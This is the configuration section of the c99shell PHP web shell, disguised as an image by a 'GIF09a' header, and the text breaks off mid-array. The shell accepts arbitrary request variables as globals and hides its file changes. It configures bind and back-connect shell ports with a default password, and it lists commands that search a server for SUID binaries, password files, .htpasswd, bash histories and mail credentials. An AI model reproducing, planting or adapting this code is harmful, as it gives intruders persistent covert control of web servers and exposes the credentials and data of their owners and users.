GIF09a
<?php
//Starting calls
if (!function_exists(\"getmicrotime\")) {function getmicrotime() {list($usec, $sec) = explode(\" \", microtime()); return ((float)$usec + (float)$sec);}}
error_reporting(5);
@ignore_user_abort(TRUE);
@set_magic_quotes_runtime(0);
$win = strtolower(substr(PHP_OS,0,3)) == \"win\";
define(\"starttime\",getmicrotime());
if (get_magic_quotes_gpc()) {if (!function_exists(\"strips\")) {function strips(&$arr,$k=\"\") {if (is_array($arr)) {foreach($arr as $k=>$v) {if (strtoupper($k) != \"GLOBALS\") {strips($arr[\"$k\"]);}}} else {$arr = stripslashes($arr);}}} strips($GLOBALS);}
$_REQUEST = array_merge($_COOKIE,$_GET,$_POST);
foreach($_REQUEST as $k=>$v) {if (!isset($$k)) {$$k = $v;}}

$shver = \"1.0 pre-release build #16\"; //Current version
//CONFIGURATION AND SETTINGS
if (!empty($unset_surl)) {setcookie(\"c99sh_surl\"); $surl = \"\";}
elseif (!empty($set_surl)) {$surl = $set_surl; setcookie(\"c99sh_surl\",$surl);}
else {$surl = $_REQUEST[\"c99sh_surl\"]; //Set this cookie for manual SURL
}

$surl_autofill_include = TRUE; //If TRUE then search variables with descriptors (URLs) and save it in SURL.

if ($surl_autofill_include and !$_REQUEST[\"c99sh_surl\"]) {$include = \"&\"; foreach (explode(\"&\",getenv(\"QUERY_STRING\")) as $v) {$v = explode(\"=\",$v); $name = urldecode($v[0]); $value = urldecode($v[1]); foreach (array(\"http://\",\"https://\",\"ssl://\",\"ftp://\",\"\\\\\\\\\") as $needle) {if (strpos($value,$needle) === 0) {$includestr .= urlencode($name).\"=\".urlencode($value).\"&\";}}} if ($_REQUEST[\"surl_autofill_include\"]) {$includestr .= \"surl_autofill_include=1&\";}}
if (empty($surl))
{
 $surl = \"?\".$includestr; //Self url
}
$surl = htmlspecialchars($surl);

$timelimit = 0; //time limit of execution this script over server quote (seconds), 0 = unlimited.

//Authentication
$login = \"\"; //login
//DON\'T FORGOT ABOUT PASSWORD!!!
$pass = \"\"; //password
$md5_pass = \"\"; //md5-cryped pass. if null, md5($pass)

$host_allow = array(\"*\"); //array (\"{mask}1\",\"{mask}2\",...), {mask} = IP or HOST e.g. array(\"192.168.0.*\",\"127.0.0.1\")
$login_txt = \"Restricted area\"; //http-auth message.
$accessdeniedmess = \"<a href=\\\"http://ccteam.ru/releases/c99shell\\\">c99shell v.\".$shver.\"</a>: access denied\";

$gzipencode = TRUE; //Encode with gzip?

$updatenow = FALSE; //If TRUE, update now (this variable will be FALSE)

$c99sh_updateurl = \"http://ccteam.ru/update/c99shell/\"; //Update server
$c99sh_sourcesurl = \"http://ccteam.ru/files/c99sh_sources/\"; //Sources-server

$filestealth = TRUE; //if TRUE, don\'t change modify- and access-time

$donated_html = \"<center><b>Owned by hacker</b></center>\";
/* If you publish free shell and you wish
add link to your site or any other information,
put here your html. */
$donated_act = array(\"\"); //array (\"act1\",\"act2,\"...), if $act is in this array, display $donated_html.

$curdir = \"./\"; //start folder
//$curdir = getenv(\"DOCUMENT_ROOT\");
$tmpdir = \"\"; //Folder for tempory files. If empty, auto-fill (/tmp or %WINDIR/temp)
$tmpdir_log = \"./\"; //Directory logs of long processes (e.g. brute, scan...)

$log_email = \"user@host.tld\"; //Default e-mail for sending logs

$sort_default = \"0a\"; //Default sorting, 0 - number of colomn, \"a\"scending or \"d\"escending
$sort_save = TRUE; //If TRUE then save sorting-position using cookies.

// Registered file-types.
//  array(
//   \"{action1}\"=>array(\"ext1\",\"ext2\",\"ext3\",...),
//   \"{action2}\"=>array(\"ext4\",\"ext5\",\"ext6\",...),
//   ...
//  )
$ftypes  = array(
 \"html\"=>array(\"html\",\"htm\",\"shtml\"),
 \"txt\"=>array(\"txt\",\"conf\",\"bat\",\"sh\",\"js\",\"bak\",\"doc\",\"log\",\"sfc\",\"cfg\",\"htaccess\"),
 \"exe\"=>array(\"sh\",\"install\",\"bat\",\"cmd\"),
 \"ini\"=>array(\"ini\",\"inf\"),
 \"code\"=>array(\"php\",\"phtml\",\"php3\",\"php4\",\"inc\",\"tcl\",\"h\",\"c\",\"cpp\",\"py\",\"cgi\",\"pl\"),
 \"img\"=>array(\"gif\",\"png\",\"jpeg\",\"jfif\",\"jpg\",\"jpe\",\"bmp\",\"ico\",\"tif\",\"tiff\",\"avi\",\"mpg\",\"mpeg\"),
 \"sdb\"=>array(\"sdb\"),
 \"phpsess\"=>array(\"sess\"),
 \"download\"=>array(\"exe\",\"com\",\"pif\",\"src\",\"lnk\",\"zip\",\"rar\",\"gz\",\"tar\")
);

// Registered executable file-types.
//  array(
//   string \"command{i}\"=>array(\"ext1\",\"ext2\",\"ext3\",...),
//   ...
//  )
//   {command}: %f% = filename
$exeftypes  = array(
 getenv(\"PHPRC\").\" -q %f%\" => array(\"php\",\"php3\",\"php4\"),
 \"perl %f%\" => array(\"pl\",\"cgi\")
);

/* Highlighted files.
  array(
   i=>array({regexp},{type},{opentag},{closetag},{break})
   ...
  )
  string {regexp} - regular exp.
  int {type}:
0 - files and folders (as default),
1 - files only, 2 - folders only
  string {opentag} - open html-tag, e.g. \"<b>\" (default)
  string {closetag} - close html-tag, e.g. \"</b>\" (default)
  bool {break} - if TRUE and found match then break
*/
$regxp_highlight  = array(
  array(basename($_SERVER[\"PHP_SELF\"]),1,\"<font color=\\\"yellow\\\">\",\"</font>\"), // example
  array(\"config.php\",1) // example
);

$safemode_diskettes = array(\"a\"); // This variable for disabling diskett-errors.
 // array (i=>{letter} ...); string {letter} - letter of a drive
//$safemode_diskettes = range(\"a\",\"z\");
$hexdump_lines = 8;// lines in hex preview file
$hexdump_rows = 24;// 16, 24 or 32 bytes in one line

$nixpwdperpage = 100; // Get first N lines from /etc/passwd

$bindport_pass = \"c99\";  // default password for binding
$bindport_port = \"31373\"; // default port for binding
$bc_port = \"31373\"; // default port for back-connect
$datapipe_localport = \"8081\"; // default port for datapipe

// Command-aliases
if (!$win)
{
 $cmdaliases = array(
  array(\"-----------------------------------------------------------\", \"ls -la\"),
  array(\"find all suid files\", \"find / -type f -perm -04000 -ls\"),
  array(\"find suid files in current dir\", \"find . -type f -perm -04000 -ls\"),
  array(\"find all sgid files\", \"find / -type f -perm -02000 -ls\"),
  array(\"find sgid files in current dir\", \"find . -type f -perm -02000 -ls\"),
  array(\"find config.inc.php files\", \"find / -type f -name config.inc.php\"),
  array(\"find config* files\", \"find / -type f -name \\\"config*\\\"\"),
  array(\"find config* files in current dir\", \"find . -type f -name \\\"config*\\\"\"),
  array(\"find all writable folders and files\", \"find / -perm -2 -ls\"),
  array(\"find all writable folders and files in current dir\", \"find . -perm -2 -ls\"),
  array(\"find all service.pwd files\", \"find / -type f -name service.pwd\"),
  array(\"find service.pwd files in current dir\", \"find . -type f -name service.pwd\"),
  array(\"find all .htpasswd files\", \"find / -type f -name .htpasswd\"),
  array(\"find .htpasswd files in current dir\", \"find . -type f -name .htpasswd\"),
  array(\"find all .bash_history files\", \"find / -type f -name .bash_history\"),
  array(\"find .bash_history files in current dir\", \"find . -type f -name .bash_history\"),
  array(\"find all .fetchmailrc files\", \"find / -type f -name .fetchmailrc\"),
  array(\"find .fetchmailrc files in current dir\", \"find . -type f -name .fetchmailrc\"),
  array(\"list file attributes on a Linux second extended file system\", \"lsattr -va\"),
  array(\"show opened ports\", \"netstat -an | grep -i listen\")
 );
}
else
{
 $cmdaliases = array(
  array(\"-----------------------------------------------------------\", \"dir\"),
  array(\"show opened ports\", \"netstat -an\")
 );
}

$sess_cookie = \"c99shvars\"; // Cookie-variable name

$usefsbuff = TRUE; //Buffer-function
$copy_unset = FALSE; //Remove copied files from buffer after pasting

//Quick launch
$quicklaunch = array(
 array(\"<img src=\\\"\".$surl.\"act=img&img=home\\\" alt=\\\"Home\\\" height=\\\"20\\\" width=\\\"20\\\" border=\\\"0\\\">\",$surl),
 array(\"<img src=\\\"\".$surl.\"act=img&img=back\\\" alt=\\\"Back\\\" height=\\\"20\\\" width=\\\"20\\\" border=\\\"0\\\">\",\"#\\\" onclick=\\\"history.back(1)\"),
 array(\"<